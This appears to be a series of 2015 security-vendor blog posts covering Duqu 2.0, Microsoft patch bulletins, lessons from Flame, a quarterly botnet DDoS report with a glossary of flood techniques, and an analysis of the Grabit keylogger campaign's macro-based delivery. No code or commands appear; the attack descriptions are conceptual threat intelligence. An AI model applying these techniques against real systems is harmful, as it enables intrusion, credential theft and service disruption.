Some of the new 2014-2015 Duqu infections are linked to the P5+1 events and venues related to the negotiations with Iran about a nuclear deal. The threat actor behind Duqu appears to have launched attacks at the venues for some of these high level talks. In addition to the P5+1 events, the Duqu 2.0 group has launched a similar attack in relation to the 70th anniversary event of the liberation of Auschwitz-Birkenau.
In the case of Kaspersky Lab, the attack took advantage of a zero-day in the Windows Kernel, and possibly up to two other, currently patched vulnerabilities, which were zero-day at that time. The analysis of the attack revealed that the main goal of the attackers was to spy on Kaspersky Lab technologies, ongoing research and internal processes. No interference with processes or systems was detected. More details can be found in our technical paper.
From a threat actor point of view, the decision to target a world-class security company must be quite difficult. On one hand, it almost surely means the attack will be exposed – it’s very unlikely that the attack will go unnoticed. So the targeting of security companies indicates that either they are very confident they won’t get caught, or perhaps they don’t care much if they are discovered and exposed. By targeting Kaspersky Lab, the Duqu attackers probably took a huge bet hoping they’d remain undiscovered; and lost.
At Kaspersky Lab, we strongly believe in transparency, which is why we are going public with this information. Kaspersky Lab is confident that its clients and partners are safe and that there is no impact on the company’s products, technologies and services.
More details can be found below:
To check your network for Duqu’s 2.0 presence, you can also use the open IOC file available here.
Microsoft releases eight security bulletins today, updating a set of forty five software vulnerabilities. This month’s updates touch a smaller set of Microsoft software, but two of the Bulletins address kernel-level vulnerabilities and require a restart. Some are being exploited as a part of serious targeted attack activity:
- Windows Kernel, win32k.sys (MS15-061)
- Internet Explorer – critical
- Windows Media Player – critical
- Microsoft Common Controls
- Microsoft Office
- Active Directory Federation Services
- Exchange Server
Two are rated Critical (MS15-056 for Internet Explorer and MS15-057 for Windows Media Player) because of their remote code execution severity. The Internet Explorer bulletin alone fixes over 20 memory corruption vulnerabilities in the IE codebase.
Most interesting of all the bulletins this month turns out to be MS15-061, patching eight different software flaws in the kernel. In particular, cve-2015-2360 was a difficult find, and this 0day was reported by our own talented colleague Maxim Golovkin. This issue presented itself within win32k.sys, which fails to properly free memory after use. It might be rated “Important” as an escalation of privilege vulnerability, but defending against its deployment as a part of targeted attack activity is most certainly critical.
Please update your Windows systems asap.
This week we joined droves of vendors and executives in celebrating InfoSecurity Europe’s 20 year anniversary. The venue, the London Olympia, is a behemoth filled wall-to-wall with company banners, awkward sales pitches, gimmicky totebags, gift lightsabers, and ‘free’ prosecco readily exchanged for cloud security pitches.
This year, the organizers wisely decided to add a small conference annex under the banner of ‘Intelligent Defence’ with the intention of attracting a more content-oriented crowd. The talks were largely research-oriented and included a fair serving of IoT bashing and malware hunting.
Here we presented our ongoing research project on whitelisting titled ‘Wolf in Sheep’s Clothing: Your next APT is Already Whitelisted’ – stay tuned for an extensive analysis!
Intelligent Defence included notable presentations by Andrew Hay (OpenDNS), Daniel Mende (ENRW), and Sergey Bratus (Dartmouth). Hay gave us a preview of his ‘labor of love’ paper on IoT beaconing in the enterprise (found here), an extensive research into the domain queries common IoT products perform out of the box and their unregulated penetration into industry verticals.
Daniel Mende walked us through performing an analysis of proprietary network protocols, effectively lifting the veil of security by obscurity by not just showcasing the failure of this particular nameless protocol but also providing the crowd with a sense of the relative ease with which these protocols can be probed, dismantled, and effectively obviated.
Finally, Sergey Bratus shared a brilliant exposition of the complex relationship between defensive and offensive computing, partially defined in terms of ‘weird machines‘ to ease a widespread difficulty in describing the dynamics that enable fruitful InfoSec research – that difficulty subsequently leads to problematic regulatory over simplifications like the expansion of the Wassenaar arrangement currently under consideration.
Intelligent Defence is a strong step in the right direction for Europe’s largest InfoSec conference. We hope to see you there next time.
A little discussed but well-attended dual-lineup conference on forensics and investigations started today in Myrtle Beach, South Carolina as “Mobile Forensics World” and the “Techno Security and Forensics Investigations Conference”. Presentation content here mostly focuses on technologies used in fighting cybercrime malware and the general misuse of mobile and computing power for serious criminal activities. Some of the talks focused on the new complexities and challenges in working with ubiquitous SSD storage technologies. One of the notable talks on SSD was from our colleagues at Belkasoft, developers of a set of reliable and effective memory dump and analysis tools. We met some of Yuri Gubanov‘s squirrels that help drive much of their tool development (a “belka” is a squirrel).
Other talks and vendors today brought to light problems and solutions for dealing with Tor, remote system access, data wiping tools, forensically acquired drives that require startup, iPhone and Android encryption and lockout technologies, and others that require examination. Upcoming talks provide discussion around audit strategies and methods, investigation and forensic tools, and more.
Three years ago, on May 28th 2012, we announced the discovery of a malware known as Flame. At the same time we published our FAQ, CrySyS Lab posted their thorough analysis of sKyWIper. A few days earlier, Maher CERT published IOCs for Flamer. In short, Flame, sKyWIper and Flamer are different names for the same threat, which took the world by surprise as the first major discovery after Stuxnet and Duqu.
Since the discovery of Flame, we reported on many other advanced malware platforms, including Regin and Equation, yet Flame remains special in terms of being one of the most complex, surprising and innovative malware campaigns we have ever seen.
Looking back at the discovery of Flame, here are some lessons we learned.
- High-end, government-grade malware can be big. A fully deployed set of Flame modules took about 20 megabytes, which was a lot. Previously, sophisticated malware would range in the order of kilobytes or hundred of kilobytes; most people would discard a 6MB executable file as “uninteresting”. Not anymore.
- Jumping airgaps. Flame was one of the first malware to implement a mechanism to bypass airgaps through the use of USB sticks. When a USB stick was plugged into a Flame infected computer without connection to the Internet, the malware saved stolen information into a hidden file on the stick. This file was invisible to most file explorers and contained up to 16MB of stolen documents and other information from the victim’s machine. When such a stick was connected to a machine infected by Flame connected to the Internet, the hidden information was taken off the stick and sent to its C&Cs.
- Dozens of C&Cs. With Flame, we ended up counting almost 100 different command and control servers. For a targeted malware, this is both unusual and a very large number. The authors of Flame created different versions of the malware connecting to many C&Cs in order to limit the impact of a takedown.
- Capturing Bluetooth audio. One of the Flame modules attempted to identify Bluetooth devices in the vicinity of the compromised machine and use them to record audio from the room. This is a rare type of attack pioneered by Flame.
- The age of mass surveillance. We believe the main purpose of Flame was to facilitate mass surveillance. The malware was designed to automatically collect everything from infected machines, ranging from documents to screenshots, keystrokes and audio. The C&C servers of Flame did not include a provision for a manual operation of the malware; everything happened automatically.
- MD5 is dead. One of the most interesting features of Flame was the way it infected other computers in the local network. The attack involved the almost magical re-engineering of a certificate that could be used to sign Windows updates. The certificate relied on an MD5 signature, which the attackers managed to fake, indicating they had the ability to break arbitrary MD5 hashes.
- Subversion of trust in Windows updates. One of the most interesting modules in Flame performed what eventually described as a “God mode” exploit – subversion of Windows updates by hijacking Windows update requests. For years, we told people to update Windows, as well as any other third party, as often as possible. Flame took advantage of the trust people have put into updates, effectively subverting it.
- The tip of the iceberg. After we discovered Flame, our generic detection started to trigger on other samples as well. By code similarity, we found two other malicious programs from the same group: Gauss and MiniFlame. This made us realize that there are many other undiscovered malware and it will probably take years to find them all.
- Everything’s connected. When we discovered Flame, most people asked – “is it related to Stuxnet?”. We’ve said, “no, there are no signs”. We were wrong. Weeks later, we found a Flame module that was also used by the 2009 version of Stuxnet for replication. Essentially, the 2009 Stuxnet was built to replicate using an exploit from Flame. This indicates the two were indeed connected. At the same time, Stuxnet was connected to Duqu and, as we found more recently, the Equation group, through their exploits originally used by the Fanny worm. Sometimes it takes longer to see all the connections, even if they are not obvious in the beginning.
- “Flame is lame”. When Kaspersky and CrySyS Lab published our analyses of Flame, some people discarded it as uninteresting. “A 20 megabytes malware can be l33t? Impossible!”. (The complaints died when the Microsoft Windows Updates attack and MD5 collision was found and patched). Mikko Hypponen from F-Secure has a wonderful blog on this topic: https://www.f-secure.com/weblog/archives/00002383.html
Finally, we’d like to end with a recording of a fantastic speech by privacy rights activist Chris Soghoian, titled “Lessons from the Bin Laden Raid and Cyberwar: Immunizations and Security Updates”.
His take on Flame begins at 5:00, however, we recommend you watch the entire clip. As Chris puts it in the clip: “no matter the short term intelligence advantage to hacking software updates, it isn’t worth it”. We concur and add, subverting security will always backfire.
A DDoS (Distributed Denial of Service) attack is one of the techniques mostly often used by cybercriminals. It is intended to reduce an information system, typically a website, to a state where it cannot be accessed by legitimate users. One popular DDoS scenario is a botnet-assisted attack.
Kaspersky Lab has long-standing, recognized expertise in combatting cyberthreats, including DDoS attacks of different types and varying degrees of complexity. The company’s experts, in particular, monitor botnet activity with the help of the DDoS Intelligence system (a part of Kaspersky DDoS Protection solution), which allows them to continuously improve our DDoS attack protection technologies. The DDoS Intelligence system is based on analyzing commands that arrive to botnets from C&C servers; it does not require a bot to be present on a user device, nor commands from the C&C server to be executed.
There are different approaches to analyzing DDoS activity. One of these is to focus on attacks against specific web resources, typically those belonging to clients protected against DDoS attacks by security service providers. However, the analysis of botnet activity in this report provides a different view of this problem, compared to the individual client-based approach.
This report presents DDoS Intelligence statistics collected from 1 January to 31 March 2015 (or Q1 2015), which is analyzed in comparison with the equivalent data collected within the previous 3-month period (1 October to 31 December 2014, or Q4 2014).
In this report, a single DDoS attack is defined as an incident during which there was no break in botnet activity lasting longer than 24 hours. Thus, if the same web resource was attacked by the same botnet after a 24-hour gap that would be regarded as two separated DDoS attacks. Attacks on the same web resource from two different botnets are also regarded as individual attacks.
The geographical distribution of DDoS victims and command & control servers is determined according to their IP addresses. In this report, the number of the unique DDoS targets is defined based on the number of unique IP addresses reported in the quarterly statistics.
It is important to note that DDoS Intelligence statistics are limited to those botnets that were detected and analyzed by Kaspersky Lab. It should also be borne in mind that botnets are only one of the tools for carrying out DDoS attacks; thus, the data presented in this report does not cover every last DDoS attack that has occurred within the specified time period.Main findings
- In Q1 2015, 23,095 botnet-assisted DDoS attacks were reported, which is 11% lower than the 25,929 attacks in Q4 2014.
- There were 12,281 unique victims of DDoS attacks in Q1 2015, which is 8% lower than the 13,312 victims in Q4 2014.
- China, the USA and Canada were the countries that faced the largest number of DDoS attacks.
- The most prolonged DDoS attack in Q1 2015 lasted for 140 hours (or about 6 days). The most frequently attacked resource faced 21 attacks within the 3 months.
- In Q1 2015, SYN DDoS and HTTP DDoS were the most common scenarios for botnet-assisted DDoS attacks.
In Q1 2015, 23,095 DDoS attacks were reported, targeting web resources in 76 countries. The number of attacks was down 11% against Q4 2014 (25,929). There was an increase (76 against 66 in Q4 2014) in the number of countries where DDoS targets were located.
In Q1 2015, 23,095 DDoS attacks were reported, targeting web resources in 76 countriesTweet
Most DDoS attacks targeted web resources in China, the USA and Canada – this was no change from Q4 2014. There were some changes in the order of the 10 most frequently attacked countries, but there were no new additions to that list.
Figure 1. The 10 most frequently attacked countries in Q4 2014 and Q1 2015
As seen in the above diagram, there has been a significant decrease in the number of attacks against the web resources in China and the United States of America; however, there was an increase in the number of attacks against Canadian servers. There was also an increase in the number of attacks against web resources in Russia, South Korea and France.
If we consider the number of DDoS attack victims in each country, the top 10 looks the same as the previous one. In Q1 2015, botnets attacked a total of 12,281 victims, which is 8% lower than the 13,312 targets in Q4 2014.
Figure 2. TOP 10 countries with the highest numbers of unique DDoS victims in Q4 2014 and Q1 2015
In Russia, South Korea and France, the number of attacked web resources has increased compared with Q4 2014, and so did the number of attacks on all targets located in these countries. In Canada, the number of attacks has increased, but the number of targets has decreased, which suggests that cybercriminals are more actively attacking a limited number of web resources in the country.
China, the USA and Canada were the countries that faced the largest number of DDoS attacksTweet
The fact that China and the USA lead the two rankings, both in terms of numbers of DDoS attacks and in numbers of victims, is explained by the relatively low web hosting prices in these two countries that encourage many companies to use hosting providers there.
In in Q1 2015, the maximum number of attacks carried out on the same web resource reached 21:Number of DDoS attacks The targeted web resource 21 A Russian-language web-site (a group of investment companies) 16 A Vietnamese web-site (wedding services provider) 15 A hosting provider in the USA
Figure 3. TOP 3 most frequently attacked web resources in Q1 2015
Although China, the USA and Canada sustained the highest number of DDoS attacks in Q1 2015, the top two most frequently attacked web resources were respectively a Russian and a Vietnamese web-site. Only one of the top three, a US hosting provider, is based in the most frequently attacked trio of countries.Time variations in the number of DDoS attacks
In Q1 2015, there were substantial time variations in the numbers of DDoS attacks*. In late January there was a peak in botnet activity and the low point came in mid-February.
Figure 4. Number of DDoS attacks over time in Q1 2015
*DDoS attacks may last for several days. In this graph, the same attack may be counted several times along the timeline, i.e. one time for each day of its duration. This results in a larger total number of DDoS attacks (30,064) than if each uninterrupted attack is counted as one (23,095).
As seen in the chart below, last December saw a dramatic increase in the number of botnet-assisted DDoS attacks. The number of attacks declined steadily through January and February, but then began to rise again in March. The December peak could be linked to the Christmas / Near Year holidays, when the cybercriminals redoubled their efforts to disrupt the operation of websites and services popular with users.
Figure 5. Monthly numbers of DDoS attacks in Q4 2014 and Q1 2015.
In Q1, Thursday became the most active day of the week in terms of numbers of botnet-assisted DDoS attacks, rather than Monday in Q4 2014. Sunday remains the quietest day for cybercriminals.
Figure 6. Numbers of DDoS attacks performed on each day of the week in Q4 2014 and Q1 2015Types and duration of DDoS attacks
The duration and the scenario of a DDoS attack are among its most important characteristics, as they define the extent of the damage inflicted on the target. Within the analyzed time period, the vast majority of attacks lasted less than 24 hours. In Q4 2014, some attacks lasted for up to two weeks; in Q1 2014, there were no attacks that would last this long.Attack duration, hours Number of targets in
Q4 2014 Number of targets in Q1 2015 150+ 5 0 100-149 8 3 50-99 299 121 20-49 735 433 10-19 1679 703 5-9 2161 1426 Less than 4 8425 9594
Figure 7. Duration of DDoS attacks in Q4 2014 and Q1 2015
The type of a DDoS attack is defined by the format of junk requests sent to the target web resource. SYN DDoS was the most popular method of performing a DDoS attack in Q1 2015, just like in Q4 2014. TCP DDoS attacks were overtaken by HHTP DDoS attacks in second place.
Figure 8. The most frequently used types of DDoS attacks in Q4 2014 and Q1 2015C&C servers and botnet types
The C&C servers used by cybercriminals to control botnets may be located in different countries. Their locations are not typically related to the cybercriminals’ physical location(s) or to the geographic distributions of the botnets controlled via these C&C servers. The USA, China and the UK host the largest numbers of C&C servers that were active in Q1 2015.
Figure 9. Numbers of botnet C&C servers by country, Q1 2015
In Q1 2015, just like in Q4 2014, bots designed to infect Linux servers were more active than those targeting Windows devices. At the same time, there was virtually no change in the number of attacks launched using Windows botnets, while the number of attacks from Linux botnets has decreased.
Figure 10. The number of attacks launched from Windows and Linux botnets in Q4 2014 and Q1 2015
Although there are far fewer Linux-based botnets, the number of attacks launched from them is larger than that of the attacks launched from Windows-based botnets; also, the attacks from Linux-based botnets are more powerful. This is because a successful infection of a Linux-based server provides the cybercriminals with vast opportunities to manipulate network protocols. In addition, infected servers typically have faster internet connections than individual computers, so more powerful attacks can be carried out.
Besides, Linux-based botnets have much longer lives than Window-based botnets do. This is because Linux-based botnets are more difficult to detect and deactivate, since Linux servers are much less likely than Windows-based servers and devices to be equipped with dedicated security solutions.
It should be also pointed out that 93.2% DDoS targets in Q1 were attacked by just one family of bots. In 6.2% cases, two families of bots simultaneously participated in an attack, and three or more participated in 0.6% cases. In such cases, either the cybercriminals simultaneously used several different bot families to perform the attack, or the clients used the services of several attackers at once.Conclusion
The number of botnet-assisted DDoS attacks has declined in Q1 2015 against Q4 2014; so has the number victims of these attacks. At the same time, this type of threat has grown to target more countries. Historically, most attacks target web resources located in the USA and China, as these two countries offer the cheapest prices for web hosting, and many web resources are located there. However, the 10 most frequently attacked targets also include victims from Europe and the APAC region. These statistics demonstrate that botnet-assisted DDoS attacks are relevant for most diverse web resources irrespective of their geographic location. Moreover, this threat is increasingly expanding its boundaries.
The cybercriminals who use botnets to carry out DDoS attacks are willing to persevere: the longest DDoS attack reported in Q1 2015 lasted for about 6 days, and the most frequently attacked web resource survived 21 attacks within the three month period. However, study shows that even a short, one-off attack may render an unprotected web resource inoperable. One such attack may cost the victim up to $444,000, not including the reputational damage associated with the unsatisfied users who failed to receive the service they expected.
Internet security companies make their contribution to combating DDoS attacks and botnets: among other things, they detect new pieces of malware and add signatures for them to the appropriate databases, protect servers from being compromised, protect computers against infections, curb C&C server activities, etc. Nevertheless, DDoS attacks remain a very popular tool with cybercriminals, so companies must take proactive care of their security. A junk traffic filtration service will allow an online resource to remain accessible for legitimate users even during a long and powerful attack.
Links that may be of interest:
A bot is a malicious program that performs various actions at a cybercriminal’s command.
A family of bots is an aggregate of bots sharing the same source code. In other words, these are different versions of the same bot, even if they are serviced by different C&C servers.
A botnet is an aggregate of devices infected with the same bot that is serviced by the same C&C server. Cybercriminals distribute special malicious programs which turn servers, computers or mobile devices into remotely managed ‘zombies’ (or bots).
A C&C (command and control) server is a server used by cybercriminals to send orders to bots and to receive reports from them. In the case of a DDoS attack, cybercriminals command bots to simultaneously send requests directly to the targeted web resource or via third-party servers, and thus carry out a ‘distributed attack’.
SYN DDoS is an aggregate of DDoS attack scenarios which exploit peculiarities in the implementation of the TCP (Transmission Control Protocol). A TCP connection is established in three steps, which resembles the process of a handshake. The client sends a packet with the SYN flag. The server receives the SYN packet and replies with a packet with the headers SYN and ACK. Then the client sends an ACK packet, and thus validates the connection. In a SYN flood attack, the attacker sends packets with a SYN flag but does not require a response packet with SYN+ACK flags to establish a connection; this causes the targeted server to waste resources on processing these requests and sending response packets.
TCP DDoS is an aggregate of attack scenarios which, just like a SYN flood, exploit peculiarities in the implementation of the TCP protocol, but establish a connection to the targeted server. In a TCP flood-type attack, once the handshake procedure is completed successfully, the attacker side uses the established connection to send a lot of junk data, or send junk data in a very slow fashion. This overloads the attacked server, so it cannot allocate resources to legitimate users.
ICMP DDoS is an aggregate of attack scenarios using the ICMP (Internet Control Message Protocol). This protocol is normally used to send messages about errors or other exceptional situations that occur while transmitting data. In the case of an attack, the attacker sends plenty of ICMP requests to the victim side, forcing it to use its computational resources to process junk requests in place of legitimate requests.
UDP DDoS is an aggregate of attack scenarios that use UDP (User Datagram Protocol), which does not require a connection to be established. The attacker sends plenty of UDP packets to the victim’s side. Each packet requires processing resources from the targeted server and its communication equipment; this overloads the victim’s computational resources.
HTTP DDoS includes all types of DDoS attacks which have web applications as their target. While carrying out an attack, the attacker may send simple GET/POST requests to the main page of the web application as well as non-typical requests, such as requests to search for information in the web application’s database, execute scripts on the web server side, etc. Extra headers or cookie files may be inserted in the request body; this is done to bypass the filters that determine a legitimate user by the presence of cookie files. Besides, the attacker may open the browser on an infected device in order to imitate the activities of a regular website visitor, and thus prevent the security systems on the victim side from detecting bots in the general visitor traffic.
Not so long ago, Kaspersky clients in the United States approached Kaspersky researchers with a request to investigate a new type of malicious software that they were able to recover from their organizations’ servers. The malware calls itself Grabit and is distinctive because of its versatile behavior. Every sample we found was different in size and activity from the others but the internal name and other identifiers were disturbingly similar. The timestamp seems valid and close to the documented infection timeline. Our documentation points to a campaign that started somewhere in late February 2015 and ended in mid-March. As the development phase supposedly ended, malware started spreading from India, the United States and Israel to other countries around the globe.
All of the dozens of samples we managed to collect were programmed in Windows machine 32bit processor, over the Microsoft .NET Framework (Visual Basic/C#). Files were compiled over the course of three days, between March 7th and 9th of 2015. The following chart illustrates how the group or individual created the samples, the size of each sample, the time of the day when each was compiled and the time lapses between each compilation.
Malware compilation timeline
The smallest sample (0.52Mb) and the largest (1.57Mb) were both created on the same day, which could indicate experiments made by the group to test features, packers and “dead code” implementations.
Looking at the chart, it is interesting to see the modus operandi as the threat actor consistently strives to achieve a variety of samples, different code sizes and supposedly more complicated obfuscation.
Along with these different sizes, activities and obfuscation, a serious encryption algorithm was also implemented in each one of them. The proprietary obfuscated string, methods and classes made it rather challenging to analyze. ASLR is also enabled, which might point to an open source RAT or even a commercial framework that packed the malicious software in a well written structure. This type of work is known as a mitigation factor for threat actors to keep their code hidden from analysts’ eyes.
During our research, dynamic analysis showed that the malicious software’s “call home” functionality communicates over obvious channels and does not go the extra mile to hide its activity. In addition, the files themselves were not programmed to make any kind of registry maneuvers that would hide them from Windows Explorer. Taking that into an equation, it seems that the threat actors are sending a “weak knight in a heavy armor” to war. It means that whoever programmed the malware did not write all the code from scratch. A well trained knight would never go to war with a blazing shield and yet a stick for a sword.
Looking into the “call home” traffic, the Keylogger functionality prepares files that act as a container for keyboard interrupts, collecting hostnames, application names, usernames and passwords. However, the interesting part lies here.
The file names contain a very informative string:
HawkEye_Keylogger_Execution_Confirmed_<VICTIM> 3.10.2015 6:08:31 PM
HawkEye is a commercial tool that has been in development for a few years now; it appeared in 2014, as a website called HawkEyeProducts, and made a very famous contribution to the hacker community.
In the website, the product shows great versatility as it contains many types of RATs, features and functionality, such as the traditional HawkEye Logger or other types of remote administration tools like Cyborg Logger, CyberGate, DarkComet, NanoCore and more. It seems to support three types of delivery: FTP, SMTP and Web-Panel.
As seen, the malware uses a number of RATs to control its victims or track their activity. One of the threat actor’s successful implementations contained the well-known DarkComet. This convenient “choose your RAT” functionality plays a very important role in the malware infection, routine and survival on the victim’s machine. The DarkComet samples are more complicated than the traditional HawkEye logger. One instance had a random key generator which sets an initialization vector of the first 4 bytes of the executable file and appends a random 5 byte key that unpacks another PE file, less than 20Kb in size. The PE file then contains another packer with an even more challenging obfuscation technique. The last sample we tested had still more complicated behavior. The code itself had the same obfuscation technique, though traffic was not transferring in clear text. Stolen data was packed and sent encrypted over HTTP random ports. This means that the group is trying to produce other types of malicious samples with different RATs.
Approximately 10,000 stolen files have been collected. Companies based in Thailand and India had the largest percentage of infected machines. By looking at the stolen credentials, it is very clear that employees sent the malware to one another, as stolen host names and internal applications are the same.
The following is the full chart, updated to May 2015:
Malware distribution by country
Demonstrating the effectiveness of their simple Keyloggers, one C2 (on May 15th) maintained thousands of victim account credentials from hundreds of infected systems.
To sum it up, Grabit threat actors did not use any sophisticated evasions or maneuvers in their dynamic activity. It is interesting to see the major differences between the core development of the malware and the actual functionality it uses.
Some malware samples used the same hosting server, and even the same credentials. Could it be that our threat actor was in a hurry?
Our guess is that we are looking at a group and not an individual. Some members of the group are more technical than the others and some are more security oriented and aware of the risks they might expose themselves to.
From what we have seen so far, the malware is being delivered as a Microsoft Office Word (.doc) email attachment, containing a malicious macro called AutoOpen. This macro simply opens a socket over TCP and sends an HTTP request to a remote server that was hacked by the group to serve as a malware hub, before downloading the malware. In some cases the malicious macro was password protected, but our threat actor might have forgotten that a .doc file is actually an archive and when that archive is opened in a convenient editor of your choice, the macro strings are shown in clear-text.
The malware is in plain view, modifying commonplace registry entries, such as the startup configurations, and not covering its tracks. Its binaries are not deleted in most cases, and its communication is in clear-text, where the victim can sniff the communication and grab the FTP/SMTP server’s credentials.
Malware derivatives are mainly located in:
C:\Users\ <user> \AppData\Roaming\Microsoft
Phishing extensions: .doc
Icons: .pdf, .doc, .ttf, .xls, .ppt, .msg, .exe
Stealer: .txt, .jpeg, .eml
Additional Executable names:
Malware extensions: .zip or .exe